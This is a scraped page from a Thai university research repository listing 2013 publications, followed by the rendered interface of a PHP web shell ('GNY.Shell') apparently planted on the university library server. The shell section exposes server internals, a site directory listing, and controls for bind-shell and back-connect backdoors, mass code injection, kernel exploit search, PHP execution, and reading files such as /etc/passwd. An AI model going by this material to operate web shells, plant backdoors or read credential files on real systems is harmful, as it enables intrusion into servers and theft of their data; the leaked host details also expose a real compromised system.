งานวิจัยมหาวิทยาลัยบูรพา

Found 2189 results
Author Keyword Title [ Year(Asc)]
2556
ขวัญเรือน ศรีนุ้ย., Khwanruan Srinui. ความหลากหลายทางชนิดของโคพีพอดและไมซิดในพื้นที่ปกปักพันธุกรรมพืชทางทะเลหมู่เกาะแสมสาร จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
กมลชนก เศรษฐบุตร., Kamolchanok Sreshthaputra. ความเป็นชุมชนผู้ขับขี่รถจักรยานยนต์ฮาร์ลีย์ เดวิดสัน ที่มีต่อความภักดีในตราสินค้า. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อิงคเตชะ. อรวรีย์, Onwaree Ingkatecha., พละศูนย์. รณรงค์, Palasoon. R, Faculty of sport science. ความแตกต่างของรูปแบบทางคิเนมาติกส์ของรยางค์ขาในการวิ่งเท้าเปล่าและการสวมรองเท้าวิ่งในเพศชายและเพศหญิง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา (Burapha University).; 2556.
รมร แย้มประทุม., Ramorn Yampratoom., บู่แก้ว. สมหญิง, Somying Bookaew., วงศ์สุทธิเลิศ. อลิสรา, Wongsuthilert. A. คุณธรรมและจริยธรรมของบัณฑิตแพทย์ที่เป็นที่ต้องการของผู้ใช้บัณฑิต. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
โชคชัยวรรัตน์. ศรายุทธ, Sarayuth Chokechaiworarat., ศรัณยา เลิศพุทธรักษ์., Sarunya Lertputtarak., สุรัติ สุพิชญางกูร., Surat Supichayangkool., สุธาศิณี สุศิวะ., Suthasinee Susiva. คุณภาพการบริการของธุรกิจโรงแรมใน สปป.ลาว เพื่อรองรับนักท่องเที่ยวจากประชาคมเศรษฐกิจอาเซียนกรณีศึกษา นครหลวงเวียงจันทน์. วารสารวิทยาลัยพาณิชยศาสตร์บูรพาปริทัศน์ = Journal of Graduate School of Commerce Burapha Review. 2556;8(1)
สุภัสตรา เก้าประดิษฐ์., ประจักษ์ น้ำประสานไทย., เรวัต แสงสุริยงค์., บุญเชิด หนูอิ่ม., สุเนตร สุวรรณละออง, พรทิพย์ พันธุ์ยุรา., รัตนา วิงวอน., กนกพร ตันวัฒนะ., สุธิดา แจ้งประจักษ์., Supatta Kaopradith., Prajuck Numprasanthai., Rewat Sangsuriyong., Booncherd Nuim., Sunate Suwanlaong., Porntip Punyura., Rattana Wingworn., Kanokporn Tunwattana., Suthida Changprachak. คุณภาพบัณฑิตหลักสูตรศิลปศาสตรบัณฑิต สาขาวิชาการพัฒนาชุมชน ปี 2545. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ณิษา สิรนนท์ธนา., จารุนันท์ ประทุมยศ., Nisa Siranonthana., Jarunan Pratoomyot. ชนิดและปริมาณกรดไขมันในฟองน้ำและแบคทีเรียที่อาศัยอยู่ในฟองน้ำ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
การะเกด เทศศรี., Karakeo Tedsree. ตัวเร่งปฏิกิริยานาโน : เทคโนโลยีการเร่งปฏิกิริยายุคใหม่. วารสารวิทยาศาสตร์บูรพา = Burapha Science Journal 2556;18(2)
รุ้งนภา ยรรยงเกษมสุข., Rungnapa Yanyongkasemsuk. ทฤษฎีปฏิสัมพันธ์เชิงสัญลักษณ์กับการอธิบายปรากฏการณ์สังคมจากมุมมองตัวแสดง. วารสารการเมือง การบริหาร และกฎหมาย = Journal of politics, administration and law. 2556;5(2)
วรเทพ มุธุวรรณ., เสาวภา สวัสดิ์พีระ., ณัฐวุฒิ เหลืองอ่อน., วิรชา เจริญดี., ปรารถนา เข็มทอง., อภิศักดิ์ เฮ่งพก., Vorathep Muthwan., Saowapa Sawatpeera, Nattawut Luang-oon., Wiracha Charoendee. ธุรกิจการค้าสัตว์ทะเลสวยงามในกลุ่มกุ้ง กั้ง ปู ของประเทศไทย. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
เพ็ญนภา กุลนภาดล., Pennapha Koolnaphadol., ประชา อินัง., Pracha Inang., พงศ์เทพ จิระโร., Pongthep Jiraro. นวัตกรรมเครือข่ายประชาสังคมเพื่อเสริมสร้างการมีส่วนร่วมของชุมชนในการเตรียมการรับภาวะวิกฤตชุมชน. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
นุชนาถ แก้วมาตร., Nuchanart Kaewmart. นักศึกษาพยาบาลกับภาวะซึมเศร้า. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = The Journal of Faculty of Nursing Burapha University. 2556;21(3)
ศิริพร จำเนียรสวัสดิ์., Siriporn Chamniansawat. บทบาทของฮอร์โมนเอสโตรเจนที่สังเคราะห์ภายในเซลล์ประสาทฮิปโปแคมปัสและเอสโตรเจนที่สังเคราะห์จาก ต่อมเพศต่อการทำงานของเซลล์ประสาทฮิปโปแคมปัส. วารสารวิทยาศาสตร์บูรพา = Burapha science journal. 2556;18(1)
พิมลจินดา. ธนวัฒน์, Pimoljida T. บทเรียนจากความล้มเหลวในการจัดการแบบมีส่วนร่วมเพื่อการพัฒนาอย่างยั่งยืน ในเขตพื้นที่ อำเภอพานทอง จังหวัดชลบุรี. วารสารการศึกษาและการพัฒนาสังคม = Journal of education and social development 2556;9(2)
วุฒิกร เที่ยงธรรม., กัญจนวลัย นนทแก้ว แฟร์รี่., พรรัตน์ แสดงหาญ., Wuttikon Theingtham., Kanvalai Nontakaew Ferry., Pornrat Sadangharn. บรรยากาศองค์การกับพฤติกรรมการให้บริการของพนักงานโรงแรมในเขตพัทยาเหนือ จังหวัดชลบุรี. วารสารการจัดการธุรกิจ มหาวิทยาลัยบูรพา = Burapha Journal of Business Management 2556;2(2)
จันทร์เรือง. ฐานชน, Tanachon Chandruang., ภารดี มหาขันธ์., Paradee Mahakhan., เทพจำนงค์. ยิ่งยศ, Yingyos Thepjumnong. บ้านเรียนมรดกใหม่: การให้การศึกษาแบบองค์รวมผ่านละคร. วารสารวิชาการมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา 2556;21(37)
ภัทราภรณ์ สุกาญจนาภรณ์., สุวดี สกุลคู., จุฬาลักษณ์ บารมี., Suwadee Sakulkoo., Chutarat Chunsiripong. ประสบการณ์ของพยาบาลที่ทำหน้าที่คัดกรองผู้บาดเจ็บ. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = The Journal of Faculty of Nursing Burapha University. 2556;21(4)
หิรัญธีรวัฒน์. ปัทมนันท์, Pattamanun Hirunteerawat., เมธิโยธิน. สุชนนี, Suchonee Methiyothin., เดชประเสริฐ. นพดล, Nappadon Dejprasert., สาวิตรี บิณฑสันต์., Sawitree Bintasan. ประสิทธิผลของการใช้กลยุทธ์สื่อสารการตลาดแบบบูรณาการ: ประกันชีวิตใน สปป.ลาว (นครหลวงเวียงจันทน์). วารสารวิทยาลัยพาณิชยศาสตร์บูรพาปริทัศน์ = Journal of Graduate School of Commerce Burapha Review. 2556;8(1)
ปราณี วงศ์จันทร์ต๊ะ., Pranee Wongjanta. ปรากฏการณ์การเกิดฟ้าผ่าและการป้องกัน. วารสารการศึกษาและการพัฒนาสังคม 2556; 9(1)
ทวีชัย สำราญวานิช., Taweechai Sumranwanich. ปริมาณคลอไรด์ที่ผิวหน้าและการแทรกซึมคลอไรด์ในโครงสร้างคอนกรีตที่ตั้งอยู่สิ่งแวดล้อมทะเลของไทย (รายงานวิจัยฉบับสมบูรณ์ปีที่ 1). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ทวีชัย สำราญวานิช., Taweechai Sumranwanich. ปริมาณคลอไรด์วิกฤตในคอนกรีตสำหรับการเริ่มเกิดสนิมของเหล็กเสริม. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ทวีชัย สำราญวานิช., Taweechai Sumranwanich. ปริมาณคลอไรด์วิกฤตในคอนกรีตสำหรับการเริ่มเกิดสนิมของเหล็กเสริม(รายงานวิจัยฉบับสมบูรณ์ ปีที่ 1). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อมรรัตน์ ชมรุ่ง., Amonrat Chomrung., ณัฐวุฒิ เหลืองอ่อน., Nattawut Luang-oon. ปริมาณไขมัน รงควัตถุแคโรทีนนอยด์ที่เหมาะสมต่อการเพิ่มความเข้มสีของปลาการ์ตูนส้มขาว (Amphiprion ocellaris). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
กนกกาญจน์ เมฆอนันต์ธวัช., นุจรี ไชยมงคล., Nujjaree Chaimongkol. ปัจจัยทำนายความรู้สึกไม่แน่นอนของบิดามารดาที่มีบุตรรับการรักษาในหออภิบาลผู้ป่วยเด็กวิกฤต. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = Journal of faculty of nursing Burapha University. 2556;21(1)
บุญภา. กนิษฐา, Kanittha Boonpa., ศรีรัตน์ ล้อมพงศ์., Srirat Lormphongs., จิตรพรรณ ภูษาภักดีภพ., Jitrapun Pusapukdepob. ปัจจัยที่มีความสัมพันธ์กับความเมื่อยล้าในพนักงานขับรถโดยสารประจำทางขนส่งมวลชนกรุงเทพ เขตการเดินรถแห่งหนึ่งในกรุงเทพมหานคร. . วารสารสาธารณสุขมหาวิทยาลัยบูรพา 2556;8(2)

Pages

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 268.23 GB of 389.83 GB (68.81%)Server IP: 10.32.1.15 - Your IP: 54.211.192.223

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0202 ]:.